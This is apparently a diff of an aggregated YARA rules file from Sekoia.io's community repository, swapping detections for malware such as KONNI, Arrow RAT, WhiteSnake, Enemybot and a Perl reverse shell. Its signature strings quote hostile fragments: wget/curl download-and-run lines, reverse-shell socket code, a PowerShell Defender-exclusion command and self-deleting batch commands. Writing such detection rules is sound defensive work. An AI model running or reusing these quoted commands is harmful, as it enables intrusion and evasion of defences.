-		$ = {65 00 63 00 68 00 6f 00 20 00 44 00 4f 00 4e 00 54 00 20 00 43 00 4c 00 4f 00 53 00 45 00 20 00 54 00 48 00 49 00 53 00 20 00 57 00 49 00 4e 00 44 00 4f 00 57 00 21 00}
-		$ = {70 00 69 00 6e 00 67 00 20 00 2d 00 6e 00 20 00 31 00 30 00 20 00 6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 20 00 3e 00 20 00 6e 00 75 00 6c 00}
-		$ = {64 00 65 00 6c 00 20 00 2f 00 61 00 20 00 2f 00 71 00 20 00 2f 00 66 00 20 00 22 00}
-		$ = "DoShellExecute"
-		$ = "DoDownloadFile"
-
 	condition:
-		all of them
+		hash.md5( pe.rich_signature.clear_data ) == "256b60751602028612562b73ecdb163c"
 }
-rule SEKOIA_Apt_Badmagic_Ld_Dll_Loader_Pshscript : FILE
+rule SEKOIA_Loader_Win_Konni_Bat : FILE
 {
 	meta:
-		description = "Detects BadMagic DLL Loader powershell script"
+		description = "Detect the BAT files (named trap.bat or yup.bat) used by KONNI"
 		author = "Sekoia.io"
-		id = "d4a23afc-693f-4fab-b2c4-15eecba047f7"
-		date = "2023-05-15"
+		id = "e8921336-6c91-4b46-bd3f-3cf4a9b31082"
+		date = "2023-09-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_badmagic_ld_dll_loader_pshscript.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8482521fe1f90c008948e551df35448b870145cf8b58f3c5019cafb66bb0ae36"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_konni_bat.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "3476e41461692c3ccfc0ef47a4d5b8822c4940987755763d2a5913e27d9350d4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -229568,26 +230212,30 @@ rule SEKOIA_Apt_Badmagic_Ld_Dll_Loader_Pshscript : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$ModulePath = \"$folder_path\\$name"
-		$ = "$ModuleExport ="
-		$ = "start-job -ScriptBlock $ScriptBlock"
-		$ = "Invoke-WebRequest -Uri"
+		$ = "del /f /q \"%~dp0\\*.zip\" > nul"
+		$ = "del /f /q \"%~dp0\\*.xml\" > nul"
+		$ = "del /f /q \"%~dp0\\wpnprv*.dll\" > nul"
+		$ = "del /f /q \"%~dp0\\*.bat\" > nul"
+		$ = "del /f /q \"%~dpnx0\" > nul"
+		$ = "echo %~dp0 | findstr /i \"system32\" > nul"
+		$ = "if %ERRORLEVEL% equ 0 (goto INSTALL) else (goto COPYFILE)"
+		$ = "if exist \"%ProgramFiles(x86)%\" ("
 
 	condition:
-		all of them and filesize < 1KB
+		3 of them and filesize < 3KB
 }
-rule SEKOIA_Backdoor_Powershellempire_Sharpire : FILE
+rule SEKOIA_Rat_Win_Arrow_Str : FILE
 {
 	meta:
-		description = "Detect Sharpire version of Empire"
+		description = "Finds Arrow RAT samples based on the specific malware strings"
 		author = "Sekoia.io"
-		id = "fed21fbd-52ed-4649-a1ff-56eae57fc9ef"
-		date = "2022-04-15"
+		id = "69f6572c-91ed-4fb6-b886-5ad2dabef3d3"
+		date = "2022-08-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_powershellempire_sharpire.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a4da54a16ee1ac3dea3b3b5a5983638ea28fd1e6d580cd48db595f15a92817a1"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_arrow_str.yar#L1-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "faf66a14e563066bb86ceadc787c092a5a13a43f936f0d9d19fbe7d4352ea5d8"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -229595,87 +230243,94 @@ rule SEKOIA_Backdoor_Powershellempire_Sharpire : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "GetAgentID" ascii wide
-		$ = "SetAgentID" ascii wide
-		$ = "StartAgentJob" ascii wide
-		$ = "get_JobThread" ascii wide
-		$ = "GetStagerURI" ascii wide
+		$hvnc01 = "DESKTOP_JOURNALRECORD" ascii
+		$hvnc02 = "DESKTOP_ENUMERATE" ascii
+		$hvnc03 = "DESKTOP_SWITCHDESKTOP" ascii
+		$hvnc04 = "DESKTOP_CREATEWINDOW" ascii
+		$hvnc05 = "StartHVNC" ascii
+		$str01 = "U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb25c" wide
+		$str02 = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath" wide
+		$str03 = "cvtres.exe" wide
+		$str04 = "qbkTHriRRbQjaArtJfF" wide
+		$str05 = "29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb24=" wide
+		$str06 = "Stub.exe" ascii wide
+		$str07 = "DePikoloData" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 1MB
+		uint16be( 0 ) == 0x4d5a and 4 of ( $hvnc* ) and 5 of ( $str* )
 }
-rule SEKOIA_Ransomware_Lin_Avoslocker_Strings : FILE
+rule SEKOIA_Generic_Perl_Reverse_Shell : FILE
 {
 	meta:
-		description = "Detect AvosLocker ransomware for Linux by using strings from its ransom note and the onion domains"
+		description = "Detects simple reverse shell written in Perl"
 		author = "Sekoia.io"
-		id = "6056e15c-d656-41cb-bea0-704776c52c92"
-		date = "2022-02-21"
+		id = "4eb2ef0d-3ada-4566-bd82-8c75d6931acc"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_lin_avoslocker_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b65cf6713027644de281f17a4c5c170fc09a154e7119d04a92aceed0e2d7e4fd"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_perl_reverse_shell.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d0a23db712746bac4684d6b4508dd891caf06d72af153b1a0ab489a93edbfaf4"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "0cd7b6ea8857ce827180342a1c955e79c3336a6cf2000244e5cfd4279c5fc1b6"
-		hash2 = "7c935dcd672c4854495f41008120288e8e1c144089f1f06a23bd0a0f52a544b1"
-		hash3 = "10ab76cd6d6b50d26fde5fe54e8d80fceeb744de8dbafddff470939fac6a98c4"
 
 	strings:
-		$s1 = "The corporations whom don't pay or fail to respond in a swift manner can be found in our blog, accessible at" ascii
-		$s2 = "http://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion" ascii
-		$s3 = "http://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad.onion" ascii
+		$ = "open(STDIN,\">&S\");"
+		$ = "open(STDERR,\">&S\");"
+		$ = "use Socket;$i="
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		filesize < 300 and all of them
 }
-rule SEKOIA_Tool_Enum4Linux_Strings
+
+rule SEKOIA_Apt_Apt28_Susp_Graphite_Downloader : FILE
 {
 	meta:
-		description = "Detects enum4linux based on strings"
+		description = "Matches the routine which decrypts the RSA key blob in the Graphite downloader"
 		author = "Sekoia.io"
-		id = "6b3094fe-1292-4da3-a1ed-9e255be531da"
-		date = "2024-02-02"
+		id = "9c9da5fe-ffd6-4c45-8ce1-9a6cf4fa2fda"
+		date = "2022-01-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_enum4linux_strings.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d3f7ddbdfb679b34777298aec84464d55fac7600b855526a7f13d8c8f17ab888"
-		score = 75
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt28_susp_graphite_downloader.yar#L3-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ca5aa7ea995aca9003fd98da2fba7bbec1e049d979a6b05e07b80876bab5a1c9"
+		score = 65
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "my $os_info = `$command`;"
-		$ = "($global_workgroup) = $os_info =~"
-		$ = "sub enum_groups {"
-		$ = "if ($shares =~ /NT_STATUS_ACCESS_DENIED/) {"
-		$ = "Can't open share list file $shares_file"
-		$ = "my $users = `$command`;"
-		$ = "my @shares = <SHARES>;"
-		$ = "foreach my $grouptype (\"builtin\", \"domain\") {"
+		$gen = { 33 D2
+        8B C1
+        6A ??
+        5E
+        F7 F6
+        8A 82 ?? ?? ?? ??
+        30 81 ?? ?? ?? ??
+        41
+        81 F9 94 04 00 00
+        72 E2 }
 
 	condition:
-		6 of them
+		uint16be( 0 ) == 0x4d5a and $gen and pe.number_of_exports == 1
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_1 : FILE
+rule SEKOIA_Tool_Bore_Rust_Any_Platform : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detects bore tunneling tool"
 		author = "Sekoia.io"
-		id = "82fd284a-47c2-4d29-9c80-f3affaa61a13"
-		date = "2023-02-03"
+		id = "c0ec0d72-de8e-4b96-9db6-a7a4e2f693f1"
+		date = "2023-07-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_sharpshooter_payload_1.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "20e42042bd03bde3d0eec42f81d560896e8ec9e67ad64611dc4bc21152db3ff0"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_bore_rust_any_platform.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c51d75088897aaffef904d560f750d780a0c814b89bf433a05189fbf7bb3285c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -229683,91 +230338,99 @@ rule SEKOIA_Generic_Sharpshooter_Payload_1 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "rc4 = function(key, str)"
-		$ = "var e={},i,b=0,c,x,l=0,a,r="
-		$ = "var plain = rc4("
-		$ = "<script language="
+		$ = "bore_cli::" ascii
+		$ = "server handshake failed" ascii
+		$ = "server listening" ascii
+		$ = "connected to server" ascii
+		$ = "server requires authentication, but no client secret was provided" ascii
+		$ = "client port number too low" ascii
+		$ = "forwarding connection" ascii
+		$ = "Address of the remote server to expose local ports" ascii
 
 	condition:
-		all of them and filesize < 2MB
+		( uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xcafebabe or uint16be( 0 ) == 0x4d5a ) and filesize < 15MB and 5 of them
 }
-
-rule SEKOIA_Apt_Apt31_Rekoobe : FILE
+rule SEKOIA_Infostealer_Win_Whitesnake_Stealer_Feb23 : FILE
 {
 	meta:
-		description = "Find Rekoobe sample via Trend Elf Hash (telfhash)"
+		description = "Finds WhiteSnake samples (stealer module)"
 		author = "Sekoia.io"
-		id = "b1461a72-76ce-4cc5-ac84-3cc87454d288"
-		date = "2023-07-10"
+		id = "68ae7fbc-4486-4b60-af5e-f37ddc58f170"
+		date = "2023-03-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt31_rekoobe.yar#L3-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "88a1a10f26ca355c4be3fd3aa914b1b1ea743018ce44c68a2f4d9e5a337d5c01"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_whitesnake_stealer_feb23.yar#L1-L31"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "90007c38c644b79b2a60d9a252bd95071c5be57c649d73b66a73a1158cddc2fb"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$fun01 = "Ibhiyptxjhiacrnxomvqjb" ascii
+		$fun02 = "Irwcvmgzsduiiizaabbczm" ascii
+		$whi = "WhiteSnake.Properties.Resources" ascii
+		$str01 = "get_UtcNow" ascii
+		$str02 = "get_IPAddress" ascii
+		$str03 = "get_Ticks" ascii
+		$str04 = "set_commands" ascii
+		$str05 = "set_Information" ascii
+		$str06 = "set_filedata" ascii
+		$str07 = "get_Jpeg" ascii
+		$str08 = "set_Culture" ascii
+		$str09 = "MakeScreenshot" ascii
+
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 100KB and elf.telfhash ( ) == "t18fc080c7c6b56a34a7f32538ac7c407982035e1581561b207f50c955d93b408404c5ef"
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $fun* ) or $whi ) and 3 of ( $str* ) or 7 of ( $str* ) ) and filesize < 100KB
 }
-
-rule SEKOIA_Infostealer_Win_Aurora_Str : FILE
+rule SEKOIA_Apt_Cloudatlas_Init_Module_Virtualalloc : FILE
 {
 	meta:
-		description = "Finds Aurora botnet samples based on characteristic strings."
+		description = "Find init module of CloudAtlas with params passed to VirtualAlloc"
 		author = "Sekoia.io"
-		id = "1f4391b8-700f-4702-9ef6-68ce3d55a176"
-		date = "2022-07-21"
+		id = "299ed681-9d1f-4b47-8389-ff5a608f49d4"
+		date = "2023-09-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_aurora_str.yar#L3-L34"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "745443bb58f00cb09a1f323f530219913eaaf0d0e71c9a25af2072006f8c5f92"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_cloudatlas_init_module_virtualalloc.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "31ffaeccc0b8fe36eea3b3a8200eff6a420b1a3937fd439dc84121654fcea502"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "02a1a9582f5ccf421b08c41c35049416b9cdefc9228daf6b38d95e9b0930cc5a"
+		hash2 = "c7f19c7c295c86867ea7fa4597ba0cebe12f751753866e7298fd5d84676facc3"
 
 	strings:
-		$str01 = "Logs.tar" ascii
-		$str02 = "*main.StealerData" ascii
-		$str03 = "AppData\\Roaming\\Armory" ascii
-		$str04 = "AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" ascii
-		$str05 = "github.com/TheTitanrain/w32" ascii
-		$str06 = "github.com/mattn/go-sqlite3" ascii
-		$str07 = "ScreenShot" ascii
-		$str08 = "*sql.stmtConnGrabber" ascii
-		$str09 = "Default\\Network\\Cookies" ascii
-		$str10 = "BuildID" ascii
-		$str11 = "Clipper" ascii
-		$str12 = "GeoPos" ascii
-		$str13 = "AppData\\Roaming\\Exodus\\exodus.wallet" ascii
-		$str14 = "FileGrabber\\Documents" ascii
-		$str15 = "193.233.48." ascii
-		$str16 = "ShellExecute" ascii
-		$str17 = "crypto/aes.(*aesCipherGCM).Encrypt" ascii
-		$str18 = "File-Download" ascii
+		$chunk_1 = {
+        6A 40
+        68 00 30 10 00
+        8B 8D ?? ?? ?? ??
+        8B 51 50
+        52
+        6A 00
+        FF 15 ?? ?? ?? ??
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 14 of them or pe.imphash ( ) == "8ee5c1c09f740fbe63e8b35dac5d6f70" or pe.imphash ( ) == "369b4f5b6c99674f15070689e1f675af" )
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and $chunk_1 and filesize < 3MB
 }
-rule SEKOIA_Win_Loader_Astasialoader_Strings : FILE
+rule SEKOIA_Bot_Lin_Enemybot_April22 : FILE
 {
 	meta:
-		description = "AstasiaLoader strings"
+		description = "Detect enemybot based on command line observed in strings"
 		author = "Sekoia.io"
-		id = "8dfabf28-4b5a-43db-87e9-5b9080541ec3"
-		date = "2023-08-16"
+		id = "5778c653-39ce-4f5d-b10b-1503b74e5041"
+		date = "2022-04-14"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/win_loader_astasialoader_strings.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "44b6f7508a82ff6a4d65defc189303eeee393b5fd498de73d74d0a2c75c87401"
-		logic_hash = "02a7bed506865d761ec03b8de4b7fc636b71f48c62e933013f2ffa23deabb62e"
+		reference = "https://twitter.com/3xp0rtblog/status/137520616938452173://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/bot_lin_enemybot_april22.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "18ea06e60259f8d7d639b0e4659f0f5e166e9589d617f5766c06968af5e56aa6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -229775,119 +230438,151 @@ rule SEKOIA_Win_Loader_Astasialoader_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "newuploaders" wide
-		$s2 = "\\infected.exe" wide
-		$s3 = "AstasiaLoader" wide
-		$s4 = "Astasia.pdb" ascii
-		$s5 = "ip-api.com/line/?fields=hosting" wide
-		$s6 = "https://api.telegram.org/bot" wide
-		$s7 = "currentscript.txt" wide
-		$s8 = "sessionlog.txt" wide
+		$cmd0 = "wget http://%s/update.sh" ascii
+		$cmd1 = "busybox wget http://%s/update.sh" ascii
+		$cmd2 = "curl http://%s/update.sh" ascii
+		$cmd3 = "chmod 777 update.sh" ascii
+		$cmd4 = "rm -rf update.sh" ascii
+		$str0 = "ENEMEYBOT" ascii xor
+		$str1 = "KEKSEC" ascii xor
+		$str2 = "/tmp/.pwned" ascii xor
+		$str3 = "echo -e \"\x65\x6e\x65\x6d\x79"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 50KB and filesize < 1MB and 5 of them
+		( uint32( 0 ) == 0x464c457f or uint32( 0 ) == 0xfeedfacf ) and ( 4 of ( $cmd* ) or 2 of ( $str* ) )
 }
-
-rule SEKOIA_Rat_Win_Nighthawk : FILE
+rule SEKOIA_Malware_Win_Mex : FILE
 {
 	meta:
-		description = "Detects Nighthawk RAT"
+		description = "Detect the MEX malware"
 		author = "Sekoia.io"
-		id = "91bc3c5b-83fd-47f8-9652-df0f6a70b693"
-		date = "2022-11-23"
+		id = "57fe8525-4bab-4078-ac6f-635f0f7963ec"
+		date = "2022-07-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_nighthawk.yar#L3-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9a0c72de5b097f74d3c44586b8355c410470992f37d9a09c5f6db36ad6286d70"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/malware_win_mex.yar#L1-L57"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "1335a212d1af0087cd0e0402f3d6c864d1aafd3df3f1e4bb3851c96c3ff403cb"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
-		hash1 = "0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988"
-		hash2 = "9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8"
-		hash3 = "38881b87826f184cc91559555a3456ecf00128e01986a9df36a72d60fb179ccf"
-		hash4 = "f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e"
-		hash5 = "b775a8f7629966592cc7727e2081924a7d7cf83edd7447aa60627a2b67d87c94"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$pattern1 = { 48 8d 0d ?? ?? ?? ?? 51 5a 48 81 c1 ?? ?? ?? ?? 48 81 c2 ?? ?? ?? ?? ff e2 }
-		$pattern2 = { 66 03 D2 66 33 D1 66 C1 E2 02 66 33 D1 66 23 D0 0F B7 C1 }
+		$ = "MEX: In-memory execution of offensive tradecraft (Version:" wide
+		$ = "Available Options:" wide
+		$ = "-meh <help>" wide
+		$ = "-mep <payload_name_to_use>" wide
+		$ = "-mec <payload_args>" wide
+		$ = "Execution examples:" wide
+		$ = "mex.exe -mep sharphound" wide
+		$ = "mex.exe -mep sharphound -mec -arg1" wide
+		$ = "mex.exe -mep get_version" wide
+		$ = "mex.exe -mep list_plugins" wide
+		$ = "Available plugins:" wide
+		$ = "Payload to execute:" wide
+		$ = "No payload arguments were provided" wide
+		$ = "Payload arguments:" wide
+		$ = "MEX - About to execute payload %s with command line arguments: %s" wide
+		$ = "MEX - About to execute payload %s with no command line arguments" wide
+		$ = "Execution of payload %s just finished. Quitting now." wide
+		$ = "There was a problem executing payload %s. Quitting now." wide
+		$ = "chisel" wide
+		$ = "enum_script" wide
+		$ = "eop_script" wide
+		$ = "mexecatz" wide
+		$ = "scshell" wide
+		$ = "shares_script" wide
+		$ = "internalmonologue" wide
+		$ = "inveigh" wide
+		$ = "pingcastle" wide
+		$ = "rubeus" wide
+		$ = "seatbelt" wide
+		$ = "sharpexec" wide
+		$ = "sharphound3" wide
+		$ = "spoolsample" wide
+		$ = "standin" wide
+		$ = "grouper2" wide
+		$ = "lockless" wide
+		$ = "sharpoxidresolver" wide
+		$ = "sharpprinter" wide
+		$ = "list_plugins" wide
+		$ = "get_version" wide
+		$ = "Current version is %s" wide
+		$ = "Supported plugins:" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 2MB and ( ( 1 of them ) or ( pe.section_index ( ".profile" ) and pe.section_index ( ".detourc" ) ) )
+		uint16( 0 ) == 0x5A4D and filesize > 10MB and 15 of them
 }
-rule SEKOIA_Tool_Godpotato : FILE
+rule SEKOIA_Loader_Win_Squirrelwaffle_Doc : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detect the Squirrelwaffle malicious document (not xls)"
 		author = "Sekoia.io"
-		id = "cc396771-f187-43ae-903f-147d15483c46"
-		date = "2023-08-23"
+		id = "caadeac3-d4c7-4d84-b539-c03cc4c6c274"
+		date = "2021-09-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_godpotato.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ea182b187fcd1ba61d3e2d10a689cf0212267dede1342e817e47551506a780ab"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_squirrelwaffle_doc.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b9f7c3605e25c8c7caa5f70e492d46fb70e7cb6002704440e7346ebfb2bbc7bf"
 		score = 75
-		quality = 80
+		quality = 76
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "[!] Cannot create process Win32Error:{0}" ascii wide
-		$s2 = "[*] process start with pid {0}" ascii wide
-		$s3 = "MEOW" ascii wide
-		$s4 = "2ae886c3-3272-40be-8d3c-ebaede9e61e1" ascii wide
-		$s5 = "GodPotatoUnmarshalTrigger" ascii wide
-		$s6 = "GodPotato.exe" ascii wide
-		$s7 = "GodPotato.exe" wide
+		$s1 = {4f4b31203d2022636d64202f632072756e646c6c33322e65786520433a5c50726f6772616d446174615c777777312e646c6c2c6c647222}
+		$s2 = {4145524f2042495a20434f4d20434f4f502045445520474f5620494e464f20494e54204d494c204d555345554d204e414d45204e4554204f52472050524f}
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them
+		any of them and filesize > 100KB
 }
 
-rule SEKOIA_Backdoor_Win_Minibus : FILE
+rule SEKOIA_Backdoor_Win_Minibike : FILE
 {
 	meta:
-		description = "Detect the MINIBUS backdoor used by UNC1549 since August 2023"
+		description = "Detect the MINIBIKE malware"
 		author = "Sekoia.io"
-		id = "f88bcf15-9a9f-4d84-adc6-db1db55fe93c"
-		date = "2024-02-29"
+		id = "d758c41a-279c-4706-9cf3-87740e45f71d"
+		date = "2024-04-08"
 		modified = "2024-12-19"
 		reference = "https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_minibus.yar#L4-L41"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "57dabcc15c84c4497b3561f19a7e464fb0dfe93576f4caea88c7cd8534cb4bfd"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_minibike.yar#L4-L37"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d09ab10aff629c6edafa7df640e98bcb6b2523a9bf4e2f2ca87f6694ccfe21bf"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "985967e245d8fbc722e30371c9ed48c3269ceaa6b9b9b80caf2b95c920c856c2"
+		hash2 = "ab0b602665b609392eacdcbfc6c1981f216c19f21e2156a55cf9998eab02227b"
+		hash3 = "8e2429d70989bbdd2ea8842dce7c3d790ebe148490ee519b47767557f4a4a733"
+		hash4 = "be86b8559a84d97aa1cc9852e60a553f5164477bacfc69b7f3453ad37fb6fd2a"
+		hash5 = "78065411e7e8eb205ddae7215a229b7c93bdca5d628670f89caa982238ac7eb6"
+		hash6 = "73bf3a5877a7fe16544d15670e3ece034e4826323ba555b3527ad4d061f44ec4"
 
 	strings:
-		$dll_150_1 = "TorvaldsPersist.dll"
-		$dll_150_2 = "FileCoAuth.exe"
-		$dll_50_1 = "TorvaldInitial.dll"
-		$dll_50_2 = "\\essential.dat"
+		$ = "Mini-Junked.dll"
 
 	condition:
